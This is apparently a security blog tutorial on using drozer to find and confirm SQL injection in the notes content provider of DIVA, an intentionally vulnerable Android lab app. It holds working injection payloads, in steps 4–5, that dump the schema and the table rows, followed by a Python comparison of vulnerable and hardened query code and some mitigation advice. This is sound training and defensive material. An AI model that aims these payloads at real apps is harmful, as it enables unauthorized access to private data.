Use Drozer To Find SQL Injection In DIVA APK

References:

Genymotion:https://www.genymotion.com/

DIVA:https://github.com/payatu/diva-andro

https://payatu.com/wp-content/uploads/2016/01/diva-beta.tar.gz

Drozer:https://labs.mwrinfosecurity.com/tools/drozer/

https://github.com/mwrlabs/drozer

Download Link:

https://github.com/mwrlabs/drozer/releases/download/2.4.4/drozer_2.4.4.deb

https://github.com/mwrlabs/drozer/releases/download/2.4.4/drozer-2.4.4.win32.msi

https://github.com/mwrlabs/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl

https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk

Document:

https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf

1. Connect to the drozer server

Start the drozer server (the agent app's embedded server) on the Genymotion Android device.

On the client PC, forward the agent's port over adb with the command “adb forward tcp:31415 tcp:31415”.

Start the console and connect to the agent: “drozer console connect”

Selecting 168b152501f68e9c (Genymotion Samsung Galaxy S9 8.0.0)

            ..                    ..:.
           ..o..                  .r..
            ..a..  . ....... .  ..nd
              ro..idsnemesisand..pr
              .otectorandroidsneme.
           .,sisandprotectorandroids+.
         ..nemesisandprotectorandroidsn:.
        .emesisandprotectorandroidsnemes..
      ..isandp,..,rotectorandro,..,idsnem.
      .isisandp..rotectorandroid..snemisis.
      ,andprotectorandroidsnemisisandprotec.
     .torandroidsnemesisandprotectorandroid.
     .snemisisandprotectorandroidsnemesisan:
     .dprotectorandroidsnemesisandprotector.

drozer Console (v2.4.3)
dz> help

drozer: Android Security Assessment Framework

Type `help COMMAND` for more information on a particular command, or `help
MODULE` for a particular module.

Commands:
         
cd     contributors  env   help  load    permissions  set    unset
clean  echo          exit  list  module  run          shell

Miscellaneous help topics:
                          
intents

2. Scan for content URI paths

dz> run app.package.list -f diva
jakhar.aseem.diva (Diva)
dz> run app.provider.
app.provider.columns    app.provider.download   app.provider.info       app.provider.query      app.provider.update 
app.provider.delete     app.provider.finduri    app.provider.insert     app.provider.read  
dz> run app.provider.finduri jakhar.aseem.diva
Scanning jakhar.aseem.diva...
content://jakhar.aseem.diva.provider.notesprovider/notes/
content://jakhar.aseem.diva.provider.notesprovider
content://jakhar.aseem.diva.provider.notesprovider/
content://jakhar.aseem.diva.provider.notesprovider/notes

3. Query the provider's data

dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes
| _id | title    | note                                 |
| 5   | Exercise | Alternate days running               |
| 4   | Expense  | Spent too much on home theater       |
| 6   | Weekend  | b333333333333r                       |
| 3   | holiday  | Either Goa or Amsterdam              |
| 2   | home     | Buy toys for baby, Order dinner      |
| 1   | office   | 10 Meetings. 5 Calls. Lunch with CEO |

4. Scan for SQL injection points

Two injection vectors are tested for each URI: the projection and the selection arguments of the provider's query() method.

dz> run scanner.provider.injection -a jakhar.aseem.diva
Scanning jakhar.aseem.diva...
Not Vulnerable:
  content://jakhar.aseem.diva.provider.notesprovider
  content://jakhar.aseem.diva.provider.notesprovider/

Injection in Projection:
  content://jakhar.aseem.diva.provider.notesprovider/notes/
  content://jakhar.aseem.diva.provider.notesprovider/notes

Injection in Selection:
  content://jakhar.aseem.diva.provider.notesprovider/notes/
  content://jakhar.aseem.diva.provider.notesprovider/notes

5. Validate the SQL injection points

dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --selection "'"
unrecognized token: "') ORDER BY title" (code 1): , while compiling: SELECT * FROM notes WHERE (') ORDER BY title
dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --projection "'"
unrecognized token: "' FROM notes ORDER BY title" (code 1): , while compiling: SELECT ' FROM notes ORDER BY title
dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --projection "* FROM SQLITE_MASTER WHERE type='table';--"
| type  | name             | tbl_name         | rootpage | sql                                                                                                 |
| table | android_metadata | android_metadata | 3        | CREATE TABLE android_metadata (locale TEXT)                                                         |
| table | notes            | notes            | 4        | CREATE TABLE notes (_id INTEGER PRIMARY KEY AUTOINCREMENT, title TEXT NOT NULL, note TEXT NOT NULL) |
| table | sqlite_sequence  | sqlite_sequence  | 5        | CREATE TABLE sqlite_sequence(name,seq)                                                              |
dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --projection "* FROM notes;--"
| _id | title    | note                                 |
| 1   | office   | 10 Meetings. 5 Calls. Lunch with CEO |
| 2   | home     | Buy toys for baby, Order dinner      |
| 3   | holiday  | Either Goa or Amsterdam              |
| 4   | Expense  | Spent too much on home theater       |
| 5   | Exercise | Alternate days running               |
| 6   | Weekend  | b333333333333r                       |
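The error messages in step 5 reveal the statement the provider builds: `SELECT <projection> FROM notes WHERE (<selection>) ORDER BY title`, with both arguments spliced in as raw text, which is why a single quote breaks the grammar and a projection of `* FROM SQLITE_MASTER ... ;--` rewrites the whole query. The following Python model is an added example, not DIVA's Java code and not part of the original post; it assumes that statement shape (inferred from the page's errors), a small constructed `notes` table, and reproduces the probes from steps 4 and 5 against a vulnerable builder and a hardened one that allowlists column names and binds filter values instead of concatenating them.

```python
import sqlite3

# Column names of the notes table, as recovered from the SQLITE_MASTER dump on the page.
ALLOWED_COLUMNS = ("_id", "title", "note")

# Constructed sample rows (a subset of the rows shown on the page).
SAMPLE_NOTES = [
    (1, "office", "10 Meetings. 5 Calls. Lunch with CEO"),
    (2, "home", "Buy toys for baby, Order dinner"),
    (3, "holiday", "Either Goa or Amsterdam"),
]


def make_db():
    """In-memory SQLite database with the schema shown in the page's SQLITE_MASTER dump."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE notes (_id INTEGER PRIMARY KEY AUTOINCREMENT, "
        "title TEXT NOT NULL, note TEXT NOT NULL)"
    )
    conn.executemany("INSERT INTO notes VALUES (?, ?, ?)", SAMPLE_NOTES)
    conn.commit()
    return conn


def vulnerable_query(conn, projection="*", selection=None):
    """Splices caller-controlled projection and selection straight into the SQL.

    The statement shape (SELECT <proj> FROM notes WHERE (<sel>) ORDER BY title)
    is an assumed model inferred from the error messages drozer printed; it is
    not DIVA's actual provider code. Returns ("rows", rows) or ("error", message)
    so both outcomes of a probe can be inspected.
    """
    where = f" WHERE ({selection})" if selection is not None else ""
    sql = f"SELECT {projection} FROM notes{where} ORDER BY title"
    try:
        return "rows", conn.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        return "error", f"{exc}, while compiling: {sql}"


def hardened_query(conn, projection=None, filters=None):
    """Allowlists column names and binds values instead of concatenating.

    This is the Python equivalent of giving SQLiteQueryBuilder a projection map
    and passing filter values through selectionArgs: untrusted text never
    becomes SQL grammar, only a bound parameter.
    """
    columns = list(projection) if projection else list(ALLOWED_COLUMNS)
    unknown = [c for c in columns if c not in ALLOWED_COLUMNS]
    if unknown:
        raise ValueError(f"rejected projection column(s): {unknown}")

    sql = "SELECT " + ", ".join(columns) + " FROM notes"
    params = []
    if filters:
        clauses = []
        for column, value in filters.items():
            if column not in ALLOWED_COLUMNS:
                raise ValueError(f"rejected filter column: {column}")
            clauses.append(f"{column} = ?")
            params.append(value)
        sql += " WHERE " + " AND ".join(clauses)
    sql += " ORDER BY title"
    return conn.execute(sql, params).fetchall()


def demo():
    """Replays the page's probes against both implementations and returns the outcomes."""
    conn = make_db()
    schema_dump = "* FROM SQLITE_MASTER WHERE type='table';--"
    results = {
        "vuln_selection_quote": vulnerable_query(conn, selection="'"),
        "vuln_projection_dump": vulnerable_query(conn, projection=schema_dump),
        "hard_selection_quote": hardened_query(conn, filters={"title": "'"}),
    }
    try:
        hardened_query(conn, projection=[schema_dump])
        results["hard_projection_dump"] = "accepted"
    except ValueError as exc:
        results["hard_projection_dump"] = str(exc)
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

Running the script shows the vulnerable builder returning the same `unrecognized token` error as the page for a bare quote and returning the schema rows for the projection payload, while the hardened builder returns no rows for the quote (it is just a bound value) and refuses the projection payload outright because it is not a known column. On Android the same effect comes from `SQLiteQueryBuilder.setProjectionMap()` and `setStrict(true)` (API 28 and later), plus not exporting the provider, or guarding it with a permission, when other apps have no business querying it.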
Posted 2019-05-08 05:40 by heycomputer